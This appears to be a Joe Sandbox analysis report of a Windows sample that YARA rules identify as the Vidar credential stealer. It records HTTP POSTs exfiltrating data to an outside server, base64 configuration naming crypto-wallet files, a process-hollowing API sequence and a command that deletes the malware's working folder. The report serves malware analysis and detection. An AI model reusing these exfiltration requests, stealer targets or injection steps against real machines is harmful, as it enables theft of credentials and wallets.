                                                                                                                                                                                                                                                                Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49756 | 65.109.242.112 | 443 | 2832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-12 10:47:36 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJ
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-05-12 10:47:36 UTC | 331 | OUT
                                                                                                                                                                                                                                                                Data Ascii: ------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------FHDAFIIDAKJDGDHIDAKJCont
2024-05-12 10:47:37 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:37 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
2024-05-12 10:47:37 UTC | 131 | IN
                                                                                                                                                                                                                                                                Data Ascii: 78RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnw=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49757 | 65.109.242.112 | 443 | 2832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-12 10:47:38 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJD
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 453
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-05-12 10:47:38 UTC | 453 | OUT
                                                                                                                                                                                                                                                                Data Ascii: ------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------AKKECAFBFHJDGDHIEHJDCont
2024-05-12 10:47:39 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:38 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
2024-05-12 10:47:39 UTC | 12 | IN
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49758 | 65.109.242.112 | 443 | 2832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-12 10:47:40 UTC | 329 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----HIDHDAAEHIEHIECBKJDG
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 131529
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-05-12 10:47:40 UTC | 16355 | OUT
                                                                                                                                                                                                                                                                Data Ascii: ------HIDHDAAEHIEHIECBKJDGContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------HIDHDAAEHIEHIECBKJDGContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------HIDHDAAEHIEHIECBKJDGCont
                                                                                                                                                                                                                                                                2024-05-12 10:47:40 UTC16355OUTData Raw: 59 55 6c 4c 53 55 44 45 6f 4e 46 42 6f 47 68 4b 53 6c 70 4b 41 43 6d 6d 6e 55 30 30 44 43 69 69 69 67 59 6c 4a 51 61 4b 42 67 61 53 69 69 67 59 6c 46 46 46 41 78 4b 53 67 30 55 44 51 55 6c 46 4a 33 6f 47 4c 53 47 67 30 47 67 42 4b 54 74 52 52 51 55 4a 53 47 6e 47 6d 6d 67 61 46 70 4b 4b 4b 42 69 66 53 6b 70 61 53 67 42 44 7a 52 51 65 61 4b 43 68 4d 38 55 6e 57 6c 4e 4a 51 4d 4b 53 6c 70 74 41 42 52 33 70 61 54 70 51 4d 53 69 6a 70 52 6d 67 59 68 70 4b 58 4e 49 66 2f 77 42 56 41 77 70 4b 50 65 67 39 61 42 68 32 70 4f 74 42 6f 37 39 61 41 44 2f 50 57 6b 7a 2f 41 4a 4e 42 6f 6f 4b 45 6f 50 35 55 64 71 42 32 6f 41 4d 39 63 30 68 50 31 4e 47 65 61 4d 30 44 45 78 6a 76 52 53 2f 72 37 34 70 42 51 4d 54 76 51 61 41 61 4b 41 41 39 61 54 4e 41 36 30 48 70 51 4d 39
                                                                                                                                                                                                                                                                Data Ascii: YUlLSUDEoNFBoGhKSlpKACmmnU00DCiiigYlJQaKBgaSiigYlFFFAxKSg0UDQUlFJ3oGLSGg0GgBKTtRRQUJSGnGmmgaFpKKKBifSkpaSgBDzRQeaKChM8UnWlNJQMKSlptABR3paTpQMSijpRmgYhpKXNIf/wBVAwpKPeg9aBh2pOtBo79aAD/PWkz/AJNBooKEoP5UdqB2oAM9c0hP1NGeaM0DExjvRS/r74pBQMTvQaAaKAA9aTNA60HpQM9
                                                                                                                                                                                                                                                                2024-05-12 10:47:40 UTC689OUTData Raw: 61 74 71 4e 68 66 4e 66 57 56 2f 64 57 31 32 32 63 7a 77 54 4d 6a 6e 50 58 35 67 63 38 30 72 44 75 65 71 58 56 34 74 31 34 69 31 7a 77 6a 62 76 66 36 65 39 79 38 74 35 4e 63 32 56 31 35 63 51 66 37 4b 70 6b 53 61 4d 4c 38 79 62 6c 59 45 62 68 6a 63 61 35 71 46 64 56 30 32 48 53 4e 44 30 61 36 2b 78 33 71 77 50 71 56 39 63 68 74 76 32 66 65 6e 44 46 68 6b 72 73 68 77 63 6a 6e 35 32 41 35 50 50 4b 52 36 39 72 45 56 6e 4e 5a 52 36 72 66 4c 61 58 44 46 35 72 63 58 44 65 58 4b 78 36 6c 6c 7a 68 69 63 44 4f 52 53 72 34 67 31 69 50 56 35 74 56 68 31 4b 36 67 76 35 69 64 39 78 62 79 6d 4a 6a 6e 71 50 6c 78 67 64 4f 42 78 77 4b 4c 42 63 39 4f 67 31 32 61 37 4d 65 70 61 44 50 63 53 58 45 32 74 57 56 68 63 58 4f 30 72 4a 65 52 72 44 6a 4d 67 37 69 52 67 78 49 50 58
                                                                                                                                                                                                                                                                Data Ascii: atqNhfNfWV/dW122czwTMjnPX5gc80rDueqXV4t14i1zwjbvf6e9y8t5Nc2V15cQf7KpkSaML8yblYEbhjca5qFdV02HSND0a6+x3qwPqV9chtv2fenDFhkrshwcjn52A5PPKR69rEVnNZR6rfLaXDF5rcXDeXKx6llzhicDORSr4g1iPV5tVh1K6gv5id9xbymJjnqPlxgdOBxwKLBc9Og12a7MepaDPcSXE2tWVhcXO0rJeRrDjMg7iRgxIPX
2024-05-12 10:47:42 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 May 2024 10:47:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-12 10:47:42 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49759 | 65.109.242.112 | 443 | 2832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-12 10:47:42 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJ
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-05-12 10:47:42 UTC | 331 | OUT | Data Ascii: ------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------JEHDHIEGIIIDHIDHDHJJCont
2024-05-12 10:47:44 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 May 2024 10:47:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-12 10:47:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49760 | 65.109.242.112 | 443 | 2832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-12 10:47:45 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHII
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-05-12 10:47:45 UTC | 331 | OUT | Data Ascii: ------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------IEHCAKKJDBKKFHJJDHIICont
2024-05-12 10:47:46 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 May 2024 10:47:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-12 10:47:46 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0



                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                Start time:12:46:50
                                                                                                                                                                                                                                                                Start date:12/05/2024
                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                                Imagebase:0x630000
                                                                                                                                                                                                                                                                File size:1'153'024 bytes
                                                                                                                                                                                                                                                                MD5 hash:43B0461D2E1C77A8530D66D3E1AE0175
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                                                Start time:12:46:50
                                                                                                                                                                                                                                                                Start date:12/05/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                                Start time:12:46:51
                                                                                                                                                                                                                                                                Start date:12/05/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                                                Imagebase:0x890000
                                                                                                                                                                                                                                                                File size:65'440 bytes
                                                                                                                                                                                                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                                                Start time:12:47:46
                                                                                                                                                                                                                                                                Start date:12/05/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BGDAAKJJDAAK" & exit
                                                                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                                                Start time:12:47:47
                                                                                                                                                                                                                                                                Start date:12/05/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                                                Start time:12:47:47
                                                                                                                                                                                                                                                                Start date:12/05/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:timeout /t 10
                                                                                                                                                                                                                                                                Imagebase:0xf50000
                                                                                                                                                                                                                                                                File size:25'088 bytes
                                                                                                                                                                                                                                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true


                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                  Execution Coverage:1.3%
                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                  Signature Coverage:5.8%
                                                                                                                                                                                                                                                                  Total number of Nodes:104
                                                                                                                                                                                                                                                                  Total number of Limit Nodes:11

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00F102FC
                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00F1030F
                                                                                                                                                                                                                                                                  • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00F1032D
                                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F10351
                                                                                                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 00F1037C
                                                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 00F103D4
                                                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 00F1041F
                                                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F1045D
                                                                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 00F10499
                                                                                                                                                                                                                                                                  • ResumeThread.KERNELBASE(?), ref: 00F104A8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610766877.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                                                                                  • String ID: GetP$Load$aryA$ress
                                                                                                                                                                                                                                                                  • API String ID: 2687962208-977067982
                                                                                                                                                                                                                                                                  • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                                                                                  • Instruction ID: 61be5efa8ab9fbbd842bd3e35cdc83a77f64332e7f5bde310071d8d801897be9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5B1E67664028AAFDB60CF68CC80BDA77A5FF88714F158524EA1CEB341D774FA418B94

                                                                                                                                                                                                                                                                  Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,VirtualProtect,?,?,0000000006:1@0000000005:@), ref: 006EEB9E
• GetProcAddress.KERNEL32(00000000), ref: 006EEBA5
• VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,?,?,0000000006:1@0000000005:@), ref: 006EEBBC
• FreeConsole.KERNELBASE(?,?,0000000006:1@0000000005:@), ref: 006EEBC5
• CreateThread.KERNELBASE(00000000,00000000,?,00705040,00000000,00000000), ref: 006EEC07
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,0000000006:1@0000000005:@), ref: 006EEC16
Strings
Memory Dump Source
• Source File: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_630000_file.jbxd
Yara matches
Similarity
• API ID: AddressAllocConsoleCreateFreeHandleModuleObjectProcSingleThreadVirtualWait
• String ID: 0000000006:1@0000000005:@$VirtualProtect$kernel32.dll
• API String ID: 2989586790-2246029265

APIs
• CreateThread.KERNELBASE(00000000,00000000,Function_00004A48,00000000,00000000,00000000), ref: 006EECA2
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 006EECB1
• ExitProcess.KERNEL32 ref: 006EECD7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_630000_file.jbxd
Yara matches
Similarity
• API ID: CreateExitObjectProcessSingleThreadWait
• String ID: sIasnnfbnxhbsAUie
• API String ID: 2188141102-1345390032

APIs
• GetCPInfo.KERNEL32(0000FDE9,?), ref: 006D0B0A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_630000_file.jbxd
Yara matches
Similarity
• API ID: Info
• String ID:
• API String ID: 1807457897-3916222277

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 006C57ED: GetConsoleOutputCP.KERNEL32(763EDE73), ref: 006C5850
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,00000000,00000000), ref: 006C6490
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 006C649A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2915228174-0
                                                                                                                                                                                                                                                                  • Opcode ID: b16b61f23456725b40941f6e7d18f9c986755b044d1615c03734dba7c08c67c3
                                                                                                                                                                                                                                                                  • Instruction ID: 438cb901b50a6cfd47730bfd952ea7b6bc979ba2be855877a9ca9ed7ac5e2d25
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b16b61f23456725b40941f6e7d18f9c986755b044d1615c03734dba7c08c67c3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B618B71904249AEDF15CFA8C844FFEBBBAEF0A314F14809DF805A7252D331D9428B69

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 006D09AD: GetOEMCP.KERNEL32(00000000), ref: 006D09D8
                                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(-00000030), ref: 006D10A9
                                                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(00000000,?), ref: 006D10EB
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 546120528-0
                                                                                                                                                                                                                                                                  • Opcode ID: b22bdefe8fc8712b229f85815673ab5017a14bc0ef83914389b9c4521b792839
                                                                                                                                                                                                                                                                  • Instruction ID: 8134657111f9caf610890325347f9d3471c3f1cbca36b62473aaedd225a6341b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b22bdefe8fc8712b229f85815673ab5017a14bc0ef83914389b9c4521b792839
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B51F370E00245AEDB20DF75C8816EABBF6EF86300F18816FD1968A751D7B59A46CB90

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 006C5E6E
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 006C5E94
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 442123175-0
                                                                                                                                                                                                                                                                  • Opcode ID: cffc50ef9627d5827b79c27a815a61ec85247ded109e34cf256a99be0d39777d
                                                                                                                                                                                                                                                                  • Instruction ID: ce5c2e7841b3cd00645d20e82575623c43464e7cbbe59ecea9d4e2498fc1a749
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cffc50ef9627d5827b79c27a815a61ec85247ded109e34cf256a99be0d39777d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF218234A002199BCB19CF19DC80AEDB7B6EB4D305F1484AEE906D7211D730EE86CB64

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 214 6c4cfc-6c4d01 215 6c4d03-6c4d1b 214->215 216 6c4d1d-6c4d21 215->216 217 6c4d29-6c4d32 215->217 216->217 218 6c4d23-6c4d27 216->218 219 6c4d44 217->219 220 6c4d34-6c4d37 217->220 222 6c4d9e-6c4da2 218->222 221 6c4d46-6c4d53 GetStdHandle 219->221 223 6c4d39-6c4d3e 220->223 224 6c4d40-6c4d42 220->224 225 6c4d55-6c4d57 221->225 226 6c4d80-6c4d92 221->226 222->215 227 6c4da8-6c4dab 222->227 223->221 224->221 225->226 228 6c4d59-6c4d62 GetFileType 225->228 226->222 229 6c4d94-6c4d97 226->229 228->226 230 6c4d64-6c4d6d 228->230 229->222 231 6c4d6f-6c4d73 230->231 232 6c4d75-6c4d78 230->232 231->222 232->222 233 6c4d7a-6c4d7e 232->233 233->222
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,006C4E09,00703910,0000000C), ref: 006C4D48
                                                                                                                                                                                                                                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,006C4E09,00703910,0000000C), ref: 006C4D5A
                                                                                                                                                                                                                                                                  Memory Dump Source
